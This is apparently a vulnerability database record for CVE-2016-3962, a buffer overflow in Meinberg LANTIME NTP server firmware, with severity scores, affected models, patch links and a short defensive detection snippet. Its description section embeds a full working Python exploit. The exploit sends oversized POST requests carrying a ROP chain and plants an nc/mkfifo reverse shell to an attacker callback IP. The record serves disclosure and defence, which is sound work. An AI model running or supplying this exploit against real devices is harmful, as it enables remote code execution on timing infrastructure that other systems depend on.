ID

VAR-201607-0010


CVE

CVE-2016-3962


TITLE

Stack-based buffer overflow vulnerability in the NTP time server interface of the firmware running on multiple Meinberg devices

Trust: 0.8

sources: JVNDB: JVNDB-2016-003488

DESCRIPTION

Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request.

Meinberg NTP Time Server is prone to multiple privilege-escalation and stack-based buffer-overflow vulnerabilities. Remote attackers can exploit these issues to execute arbitrary code in the context of the application or gain elevated privileges. Other attacks are also possible.

The following products are affected:
Meinberg IMS-LANTIME M3000 Version 6.0 and prior
Meinberg IMS-LANTIME M1000 Version 6.0 and prior
Meinberg IMS-LANTIME M500 Version 6.0 and prior
Meinberg LANTIME M900 Version 6.0 and prior
Meinberg LANTIME M600 Version 6.0 and prior
Meinberg LANTIME M400 Version 6.0 and prior
Meinberg LANTIME M300 Version 6.0 and prior
Meinberg LANTIME M200 Version 6.0 and prior
Meinberg LANTIME M100 Version 6.0 and prior
Meinberg SyncFire 1100 Version 6.0 and prior
Meinberg LCES Version 6.0 and prior

Meinberg IMS-LANTIME M3000 and the other listed models are NTP time servers made by the German company Meinberg.
#!/usr/bin/python
#
# EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit
# EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/
#
# 271 - trigger notifications
# 299 - copy user defined notifications
# Kernel Version: 2.6.15.1
# System Version: 530
# Lantime configuration utility 1.27
# ELX800/GPS M4x V5.30p

import socket
import struct
import telnetlib
import sys
import time

if len(sys.argv) < 3:
    print "[-] <Host> <Callback IP> "
    exit(1)

host = sys.argv[1]
callback_ip = sys.argv[2]

print "[+] exploiting Meinburg M400"

port = 80

###################################################################
#
# Copy user_defined_notification to /www/filetmp
# Append reverse shell string to /file/tmp
#
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )

param = "A" * 0x2850

resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"

system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8

#must have a listener setup to receive the callback connection on ip 192.168.60.232
# i.e. nc -v -l -p 4444
command = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo "{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash</tmp/foo|{nc,' + callback_ip +'0,4444}>/tmp/foo;" >> /www/filetmp'

msg = "button=" + "A"*10028
msg += struct.pack("I", system )
msg += struct.pack("I", exit )
msg += struct.pack("I", some_str )
msg += command + "\x00"

resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg

csock.send(resp)
csock.close()
time.sleep(1)

###################################################################
#
# Copy /www/filetmp to user_defined_notification
#
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )

param = "A" * 0x2850

resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"

send_cmd = 0x807ED88
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
ret = 0x804CE65

#stack pivot
stack_pivot = 0x8049488

msg = "button=" + "A" * 9756
msg += "B" * 28
msg += struct.pack("I", 0x7FFEE01A ) # ebp
msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret
msg += struct.pack("I", some_str - 0x100 ) # some place
msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret
msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret
msg += struct.pack("I", ret ) * (71/4)
msg += struct.pack("I", send_cmd )
msg += struct.pack("I", exit )
msg += struct.pack("I", 0x80012111 ) # [eax + 0x60]
msg += struct.pack("I", some_str ) # buffer
msg += struct.pack("I", 0xffffffff ) # count
msg += "E" * 120
msg += struct.pack("I", 0xB1E8B434 ) # ebx
msg += struct.pack("I", some_str - 100 ) # esi
msg += struct.pack("I", some_str - 100 ) # edi
msg += struct.pack("I", some_str - 0x100 ) # ebp
msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret
msg += "A" * 100

resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg

csock.send(resp)
csock.close()
time.sleep(1)

###################################################################
#
# Trigger reverse shell
#
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )

param = "A" * 0x2850

resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"

send_cmd = 0x807ED88
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
ret = 0x804CE65

#stack pivot
stack_pivot = 0x8049488

msg = "button=" + "A" * 9756
msg += "B" * 28
msg += struct.pack("I", 0x7FFEE01A ) # ebp
msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret
msg += struct.pack("I", some_str - 0x100 ) # some place
msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret
msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret
msg += struct.pack("I", ret ) * (71/4)
msg += struct.pack("I", send_cmd )
msg += struct.pack("I", exit )
msg += struct.pack("I", 0x800120f5 ) # [eax + 0x60]
msg += struct.pack("I", some_str ) # buffer
msg += struct.pack("I", 0xffffffff ) # count
msg += "E" * 120
msg += struct.pack("I", 0xB1E8B434 ) # ebx
msg += struct.pack("I", some_str - 100 ) # esi
msg += struct.pack("I", some_str - 100 ) # edi
msg += struct.pack("I", some_str - 0x100 ) # ebp
msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret
msg += "A" * 100

resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg

csock.send(resp)
csock.close()
time.sleep(1)

print "[+] cleaning up"

###################################################################
#
# Kill all mains that are hung-up
#
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )

param = "A" * 0x2850

resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"

system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8

command = 'killall main'

msg = "button=" + "A"*10028
msg += struct.pack("I", system )
msg += struct.pack("I", exit )
msg += struct.pack("I", some_str )
msg += command + "\x00"

resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg

csock.send(resp)
csock.close()

print "[+] enjoy"

Trust: 2.07

sources: NVD: CVE-2016-3962 // JVNDB: JVNDB-2016-003488 // BID: 91400 // VULHUB: VHN-92781 // PACKETSTORM: 137947
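A defender-side check for this record, added here as an example and not part of the VARIoT record or of the Securifera exploit: it flags POST requests to /cgi-bin/main (the CGI endpoint the exploit above hits) whose form field is far longer than any legitimate web-UI value, and compares a LANTIME firmware version string against the fixed release 6.20.004. The length threshold, the host name and the sample requests are assumptions constructed for the example.

```python
from urllib.parse import parse_qsl

MAX_PARAM_LEN = 1024           # assumption: normal UI form values are far shorter
TARGET_PATH = "/cgi-bin/main"  # CGI endpoint targeted by the public exploit

def build_post(host: str, path: str, body: bytes) -> bytes:
    """Construct a raw HTTP/1.1 POST for the sample data (constructed, not captured)."""
    head = (f"POST {path} HTTP/1.1\r\nHost: {host}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode()
    return head + body

def parse_request(raw: bytes):
    """Split a raw request into (method, path, body); headers are not needed here."""
    head, _, body = raw.partition(b"\r\n\r\n")
    method, target, _ = head.split(b"\r\n", 1)[0].decode("latin-1").split(" ", 2)
    return method, target.split("?", 1)[0], body

def oversized_params(raw: bytes, limit: int = MAX_PARAM_LEN):
    """Return [(name, length)] for form fields sent to TARGET_PATH that exceed limit."""
    method, path, body = parse_request(raw)
    if method != "POST" or path != TARGET_PATH:
        return []
    # latin-1 keeps every byte, so the ROP-chain bytes after the padding still count
    fields = parse_qsl(body.decode("latin-1"), keep_blank_values=True)
    return [(name, len(value)) for name, value in fields if len(value) > limit]

def firmware_is_affected(version: str, fixed: str = "6.20.004") -> bool:
    """True when a LANTIME firmware version string is older than the fixed release."""
    as_tuple = lambda s: tuple(int(part) for part in s.split("."))
    return as_tuple(version) < as_tuple(fixed)

# Constructed samples: a normal settings save and an exploit-shaped request
BENIGN = build_post("lantime.example", TARGET_PATH, b"button=Save&ntp_server=10.0.0.1")
SUSPECT = build_post("lantime.example", TARGET_PATH,
                     b"button=" + b"A" * 10028 + b"\xb0\x90\x04\x08")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, oversized_params(req) or "ok")
    print("6.0 affected:", firmware_is_affected("6.0"))
```

The same length check can be applied at a reverse proxy or in web-server log review; the firmware comparison is only meaningful for the version string format shown on this page (dotted numeric fields).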

AFFECTED PRODUCTS

vendor:meinbergmodel:lcesscope:eqversion: -

Trust: 1.0

vendor:meinbergmodel:lantime m100scope:eqversion: -

Trust: 1.0

vendor:meinbergmodel:lantime m200scope:eqversion: -

Trust: 1.0

vendor:meinbergmodel:ims-lantime m3000scope:eqversion: -

Trust: 1.0

vendor:meinbergmodel:lantime m300scope:eqversion: -

Trust: 1.0

vendor:meinbergmodel:ntp serverscope:lteversion:6.0

Trust: 1.0

vendor:meinbergmodel:ims-lantime m1000scope:eqversion: -

Trust: 1.0

vendor:meinbergmodel:lantime m400scope:eqversion: -

Trust: 1.0

vendor:meinbergmodel:lantime m600scope:eqversion: -

Trust: 1.0

vendor:meinbergmodel:syncfire 1100scope:eqversion: -

Trust: 1.0

vendor:meinbergmodel:ims-lantime m500scope:eqversion: -

Trust: 1.0

vendor:meinbergmodel:lantime m900scope:eqversion: -

Trust: 1.0

vendor:meinberg funkuhrenmodel:ims-lantime m1000scope: - version: -

Trust: 0.8

vendor:meinberg funkuhrenmodel:ims-lantime m3000scope: - version: -

Trust: 0.8

vendor:meinberg funkuhrenmodel:ims-lantime m500scope: - version: -

Trust: 0.8

vendor:meinberg funkuhrenmodel:lantime m100scope: - version: -

Trust: 0.8

vendor:meinberg funkuhrenmodel:lantime m200scope: - version: -

Trust: 0.8

vendor:meinberg funkuhrenmodel:lantime m300scope: - version: -

Trust: 0.8

vendor:meinberg funkuhrenmodel:lantime m400scope: - version: -

Trust: 0.8

vendor:meinberg funkuhrenmodel:lantime m600scope: - version: -

Trust: 0.8

vendor:meinberg funkuhrenmodel:lantime m900scope: - version: -

Trust: 0.8

vendor:meinberg funkuhrenmodel:lcesscope: - version: -

Trust: 0.8

vendor:meinberg funkuhrenmodel:ntp serverscope:ltversion:6.20.004

Trust: 0.8

vendor:meinberg funkuhrenmodel:syncfire 1100scope: - version: -

Trust: 0.8

vendor:meinbergmodel:ntp serverscope:eqversion:6.0

Trust: 0.6

sources: JVNDB: JVNDB-2016-003488 // CNNVD: CNNVD-201606-551 // NVD: CVE-2016-3962

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2016-3962
value: HIGH

Trust: 1.0

NVD: CVE-2016-3962
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201606-551
value: HIGH

Trust: 0.6

VULHUB: VHN-92781
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2016-3962
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-92781
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2016-3962
baseSeverity: HIGH
baseScore: 7.3
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: LOW
exploitabilityScore: 3.9
impactScore: 3.4
version: 3.0

Trust: 1.8

sources: VULHUB: VHN-92781 // JVNDB: JVNDB-2016-003488 // CNNVD: CNNVD-201606-551 // NVD: CVE-2016-3962

PROBLEMTYPE DATA

problemtype:CWE-119

Trust: 1.9

sources: VULHUB: VHN-92781 // JVNDB: JVNDB-2016-003488 // NVD: CVE-2016-3962

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 137947 // CNNVD: CNNVD-201606-551

TYPE

buffer overflow

Trust: 0.6

sources: CNNVD: CNNVD-201606-551

CONFIGURATIONS

sources: JVNDB: JVNDB-2016-003488

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-92781

PATCH

title:Meinberg Security Advisory: [MBGSA-1604] WebUI and NTPurl:https://www.meinbergglobal.com/english/news/meinberg-security-advisory-mbgsa-1604-webui-and-ntp.htm

Trust: 0.8

title:Fixes for the stack-based buffer overflow vulnerability in multiple Meinberg productsurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=62467

Trust: 0.6

sources: JVNDB: JVNDB-2016-003488 // CNNVD: CNNVD-201606-551

EXTERNAL IDS

db:NVDid:CVE-2016-3962

Trust: 2.9

db:ICS CERTid:ICSA-16-175-03

Trust: 2.5

db:EXPLOIT-DBid:40120

Trust: 1.1

db:JVNDBid:JVNDB-2016-003488

Trust: 0.8

db:CNNVDid:CNNVD-201606-551

Trust: 0.7

db:BIDid:91400

Trust: 0.3

db:PACKETSTORMid:137947

Trust: 0.2

db:VULHUBid:VHN-92781

Trust: 0.1

sources: VULHUB: VHN-92781 // BID: 91400 // JVNDB: JVNDB-2016-003488 // PACKETSTORM: 137947 // CNNVD: CNNVD-201606-551 // NVD: CVE-2016-3962

REFERENCES

url:https://ics-cert.us-cert.gov/advisories/icsa-16-175-03

Trust: 2.5

url:https://www.exploit-db.com/exploits/40120/

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3962

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3962

Trust: 0.8

url:https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/

Trust: 0.1

url:https://github.com/securifera/cve-2016-3962-exploit

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2016-3962

Trust: 0.1

sources: VULHUB: VHN-92781 // JVNDB: JVNDB-2016-003488 // PACKETSTORM: 137947 // CNNVD: CNNVD-201606-551 // NVD: CVE-2016-3962

CREDITS

Ryan Wincey

Trust: 0.3

sources: BID: 91400

SOURCES

db:VULHUBid:VHN-92781
db:BIDid:91400
db:JVNDBid:JVNDB-2016-003488
db:PACKETSTORMid:137947
db:CNNVDid:CNNVD-201606-551
db:NVDid:CVE-2016-3962

LAST UPDATE DATE

2025-04-13T23:02:54.663000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-92781date:2017-09-03T00:00:00
db:BIDid:91400date:2016-06-23T00:00:00
db:JVNDBid:JVNDB-2016-003488date:2016-07-11T00:00:00
db:CNNVDid:CNNVD-201606-551date:2016-07-04T00:00:00
db:NVDid:CVE-2016-3962date:2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:VULHUBid:VHN-92781date:2016-07-03T00:00:00
db:BIDid:91400date:2016-06-23T00:00:00
db:JVNDBid:JVNDB-2016-003488date:2016-07-11T00:00:00
db:PACKETSTORMid:137947date:2016-07-18T21:50:07
db:CNNVDid:CNNVD-201606-551date:2016-06-24T00:00:00
db:NVDid:CVE-2016-3962date:2016-07-03T14:59:03.477